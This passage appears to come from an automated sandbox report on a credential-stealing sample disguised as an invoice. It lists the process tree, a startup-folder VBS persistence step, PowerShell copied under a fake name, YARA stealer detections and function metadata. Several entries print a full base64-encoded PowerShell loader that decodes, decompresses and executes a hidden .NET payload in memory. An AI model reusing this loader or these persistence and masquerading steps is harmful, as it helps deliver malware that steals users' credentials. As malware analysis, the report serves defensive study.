lAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Imagebase:	0x3d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:16:06
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:16:10
Start date:	31/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x10000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1452651093.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:16:20
Start date:	31/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
Imagebase:	0x7ff783f40000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:14:05
Start date:	31/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
Imagebase:	0x7ff783f40000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:14:06
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y
Imagebase:	0x7ff6692d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:14:06
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:14:09
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Imagebase:	0x340000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:14:09
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:14:11
Start date:	31/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xc10000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1617686351.0000000003324000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	88%
Signature Coverage:	12%
Total number of Nodes:	50
Total number of Limit Nodes:	2

Executed Functions

Function 0A031D70 Relevance: 3.1, Strings: 2, Instructions: 629
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 0A031E6D
fq, xrefs: 0A031E80

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: fq$8
API String ID: 0-1651916650
Opcode ID: 1b683fbeb2127b1e74e69604326ba9b3ae6d93eeb9fae06fcdd3cedba5b7fd06
Instruction ID: 14ec40f09ee3d89f7f18c1425399915ec7d1e3a58cf9461152a38b6ad1a05e26
Opcode Fuzzy Hash: 1b683fbeb2127b1e74e69604326ba9b3ae6d93eeb9fae06fcdd3cedba5b7fd06
Instruction Fuzzy Hash: B262C575E002298FDB64DF69C850AD9B7B1FF89310F1186EAD909A7354DB34AE81CF90

Function 0A035478 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A035535

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f255037aece53ec9ddf8b1e55b0aea0d157c724c061bf8e712ef98b6d1c897dc
Instruction ID: e0719c88313f5d3a6abfa62a24a75ac776b7e6d271b295272f849ba5475879d1
Opcode Fuzzy Hash: f255037aece53ec9ddf8b1e55b0aea0d157c724c061bf8e712ef98b6d1c897dc
Instruction Fuzzy Hash: AB4188B9D052589FCF14CFAAD980ADEFBB1BB09310F14942AE814B7310D735A942CF68

Function 0A035480 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A035535

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1436fd3ebcc631458847f9607ef6bdec7a77cf3d9203181d1649710db67980f9
Instruction ID: bc0cd7456e8c7a8076860b55c152179f8dcc5c2fe7cbfff7802b96112c413eed
Opcode Fuzzy Hash: 1436fd3ebcc631458847f9607ef6bdec7a77cf3d9203181d1649710db67980f9
Instruction Fuzzy Hash: E04197B9D0125C9FCF14CFAAD980ADEFBB5BB09310F14902AE818B7210D735A941CF68

Function 0A036D00 Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0A036D96

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7e6e605af2ef00ef157e6779faecbf0b55845aa810ed903b7c0bc5c7cdb3eb16
Instruction ID: b046db895c999ea8c9d099863f10aa0920d06e6f4221649bc9697e6a08aa4e17
Opcode Fuzzy Hash: 7e6e605af2ef00ef157e6779faecbf0b55845aa810ed903b7c0bc5c7cdb3eb16
Instruction Fuzzy Hash: 8E31EEB5D01218AFDB24DFA9D980AAEFBF4BF48310F14842AE805B7200C7796901CF99

Function 0A036D08 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0A036D96

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 356ef36bb75fbdc92bf7eacaec167d49fd0cbf8b5e5e82700c210303fee663e2
Instruction ID: 05477089624ae4512f0dd7a0008ac126088425f741932f60b2b63b4f4558a5c5
Opcode Fuzzy Hash: 356ef36bb75fbdc92bf7eacaec167d49fd0cbf8b5e5e82700c210303fee663e2
Instruction Fuzzy Hash: B4318AB5D01218AFDF14CFAAD980A9EFBF5BF49310F14942AE815B7200C775A945CFA8

Function 0A03F8B8 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb33ec615091896cf4dbd0bf066bfc64ab9b5d656dfa3430151ee21cf95366af
Instruction ID: c8d91b687de833e83c8a45e4ac0c517717b226e08e081884d1db5b3edd8106b2
Opcode Fuzzy Hash: cb33ec615091896cf4dbd0bf066bfc64ab9b5d656dfa3430151ee21cf95366af
Instruction Fuzzy Hash: B7C1DEB5E0120DEFDB54CFA9D484BADBBF6FB49300F10806AE80AAB251DB745985CF04

Function 0A03F8AA Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b262682d536624af4caafe6ba3f83e98c833480357323ccddb9f7f862ea634b
Instruction ID: a354c033eb6a47cfaf668ebb4177579c0a256aa659b1f6228e3e3ec77f0f1eea
Opcode Fuzzy Hash: 3b262682d536624af4caafe6ba3f83e98c833480357323ccddb9f7f862ea634b
Instruction Fuzzy Hash: 83C1DEB5E01209DFDB54CFA9D884B9DBBF6FB89300F14806AE80AAB255DB745985CF04

Function 02F9EA60 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647afe773a4384addaaef3deb07d9dedebadd81926ae8d78f946698119ceec3e
Instruction ID: 4a6451a36aa8d2a2ef600db05fd391b2983a64c5474c5d87a5852b271a40ee49
Opcode Fuzzy Hash: 647afe773a4384addaaef3deb07d9dedebadd81926ae8d78f946698119ceec3e
Instruction Fuzzy Hash: 3A819C71A04208CFEF28CF59C484BAAB7B2FB84380F19C56BD6169B655C338ED46CB51

Function 02F9AA89 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7742f8ccb667f61f70652e336706d033b43ed7adff412b470a68d6d1912398b
Instruction ID: b4ddff588019c6eab12bc1afbfcaf3f3624e731b358e8beefa5e67e68e704a64
Opcode Fuzzy Hash: f7742f8ccb667f61f70652e336706d033b43ed7adff412b470a68d6d1912398b
Instruction Fuzzy Hash: 73614F35B00204DFEB04CF69D599BAABBF2EF88351F258469E6069B365DB34DC41CB50

Function 076D00F0 Relevance: 14.3, Strings: 11, Instructions: 557
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 076D01AE
4'q, xrefs: 076D0677
4'q, xrefs: 076D0501
$q, xrefs: 076D0659
4'q, xrefs: 076D04F5
4'q, xrefs: 076D0683
4'q, xrefs: 076D0355
$q, xrefs: 076D061F
4'q, xrefs: 076D01A2
$q, xrefs: 076D064D
4'q, xrefs: 076D0361

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q
API String ID: 0-3653725761
Opcode ID: de0a2225dfac25fede0e7b5619d0922d4febc512488890703ebe981e76d657e0
Instruction ID: 015d7065976b439995242ae69a10af9d86d8c82223353ef71a98eb0f75547e3a
Opcode Fuzzy Hash: de0a2225dfac25fede0e7b5619d0922d4febc512488890703ebe981e76d657e0
Instruction Fuzzy Hash: 2D022AB1F15356DFDB258B75D8047AAB7A1AFC5210F24806BD906DB351EA31CC42CBA1

Function 076D0CF8 Relevance: 12.8, Strings: 10, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 076D0DDF
$q, xrefs: 076D0DD3
4'q, xrefs: 076D0FCE
$q, xrefs: 076D0F83
4'q, xrefs: 076D0DFB
$q, xrefs: 076D0D88
4'q, xrefs: 076D0E07
4'q, xrefs: 076D0FC2
$q, xrefs: 076D0FAB
$q, xrefs: 076D0F9F

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
API String ID: 0-4104424984
Opcode ID: e988cb0635717847c31d050a1d122e25cf6e259001131551935d324e89bda284
Instruction ID: 4d0dd141af0ac374625fb8a3eed4ac3fb1819aececc2680f1bfc951ec1723762
Opcode Fuzzy Hash: e988cb0635717847c31d050a1d122e25cf6e259001131551935d324e89bda284
Instruction Fuzzy Hash: 83912AB1F2434A9FDB259B3594507AAB7A1EF86210F28807BD807CB351DB31DD46C7A2

Function 076D1425 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XXq, xrefs: 076D15D3
XXq, xrefs: 076D154A
Teq, xrefs: 076D1508
XXq, xrefs: 076D15C7
XXq, xrefs: 076D1556

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: Teq$XXq$XXq$XXq$XXq
API String ID: 0-1928333455
Opcode ID: 81daa37ec5750d04da7d7e2cad04c226cd140dc076f97c42fcd2b6317ae0053f
Instruction ID: e997557082727a57ab0de872b633b6398e6789fb5a7537ef88154fb9dacae8fe
Opcode Fuzzy Hash: 81daa37ec5750d04da7d7e2cad04c226cd140dc076f97c42fcd2b6317ae0053f
Instruction Fuzzy Hash: 0B5157F1F2424A9BEB285A7898147BAB3929FC7200F194036D5079F392EFB5CC46C761

Function 076D0CD8 Relevance: 3.8, Strings: 3, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 076D0DD3
4'q, xrefs: 076D0DFB
$q, xrefs: 076D0D88

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$$q$$q
API String ID: 0-3789935075
Opcode ID: e52b58ef58f91768bbcd0e11eb4505b6c2fd8f6868aea46d1fb6fa9ae88486c0
Instruction ID: 2f9f96aafb0d650a945de6ff6e959e7f1ece4536a38f3571406b18d41f0d75f9
Opcode Fuzzy Hash: e52b58ef58f91768bbcd0e11eb4505b6c2fd8f6868aea46d1fb6fa9ae88486c0
Instruction Fuzzy Hash: 773104B4E2434AAFDB258F3498607BABBB19F4A210F144467D806CB352D735DD81CBB2

Function 076D05B4 Relevance: 3.8, Strings: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 076D0677
$q, xrefs: 076D061F
$q, xrefs: 076D064D

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$$q$$q
API String ID: 0-3789935075
Opcode ID: f0467ec15bfe223acedd3abeb917d47b4cda8c758cff8afa6a8f2200b193075e
Instruction ID: 12d30331bebc717ba0a35af69ff2ad6d9d53d373a564252b603273bc44c98eac
Opcode Fuzzy Hash: f0467ec15bfe223acedd3abeb917d47b4cda8c758cff8afa6a8f2200b193075e
Instruction Fuzzy Hash: 3421A2F4F24386DFDB208EA5D8407AABBB1ABC5214F258067D806A7341D731CD51CBA2

Function 076D05C8 Relevance: 3.8, Strings: 3, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 076D0677
$q, xrefs: 076D061F
$q, xrefs: 076D064D

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$$q$$q
API String ID: 0-3789935075
Opcode ID: 372cd771818fd00e1e8325c6f2212140c99f09c0094216b13d21d7a3f2b0b908
Instruction ID: 05d266675425103559ad1d75173286ded143e5ff58a06a0308999d419177da8b
Opcode Fuzzy Hash: 372cd771818fd00e1e8325c6f2212140c99f09c0094216b13d21d7a3f2b0b908
Instruction Fuzzy Hash: F1118FF4F2438ADBDB248EA5D94476ABBB4ABC5210F15806AD806A7341E732CC51CAA1

Function 076D47B8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'q, xrefs: 076D4F69
4'q, xrefs: 076D4F79

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: bed5a651a8a75c3ac1b944a6a629fd548d6b2b9db74bd793a6d60d83c08ba338
Instruction ID: 6a03006f9c661d7fdeb5eb07492bbf3ca1d4d01b8575550caa6b7c5a9697b41c
Opcode Fuzzy Hash: bed5a651a8a75c3ac1b944a6a629fd548d6b2b9db74bd793a6d60d83c08ba338
Instruction Fuzzy Hash: 7542E4B8E2525ADFDB14DFA9D494AADBBB2FF89300F108019D916AB394CB345D42CF50

Function 076D52E0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 076D5786
4'q, xrefs: 076D5776

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q
